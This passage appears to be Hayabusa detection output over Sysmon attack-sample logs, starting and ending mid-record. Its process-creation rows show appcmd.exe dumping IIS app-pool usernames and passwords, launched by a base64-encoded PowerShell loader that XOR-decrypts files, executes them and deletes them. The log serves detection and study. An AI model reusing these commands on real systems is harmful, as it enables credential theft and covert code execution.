JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJ